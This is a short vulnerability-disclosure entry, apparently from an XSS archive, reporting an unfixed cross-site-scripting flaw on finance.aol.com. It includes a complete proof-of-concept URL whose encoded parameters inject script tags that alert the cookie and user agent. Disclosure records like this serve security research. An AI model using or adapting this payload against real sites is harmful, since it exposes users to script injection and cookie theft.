Security researcher XaDoS, has submitted on 27/05/2009 a cross-site-scripting (XSS) vulnerability affecting finance.aol.com, which at the time of submission ranked 48 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 18/07/2010. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 27/05/2009 |
Date published: 18/07/2010 |
Fixed? Mail us! | Status: UNFIXED |
Author: XaDoS |
Domain: finance.aol.com |
Category: XSS |
Pagerank: 48 |
URL: http://finance.aol.com/usw/quotes/stockscreener?c_mc=cust&c_mc_f=100B!!!(HeY%20AdmiN!)%22%3E%3Cscrip t%3Ealert(document.cookie)%3C/script%3E&c_mc_t=500B%22%3E%3Cbody%20background=javascript:%27%22%3E%3 Cscript%3Ealert(navigator.userAgent)%3C/script%3E%3E%3C/body%3E&f_per=cust&f_per_f=0&f_per_t=15&r_dv =&r_nor=5&r_off=0&s_off=0By_XaDoS&symbols_together=PG |
Click here to view the mirror
|
|
|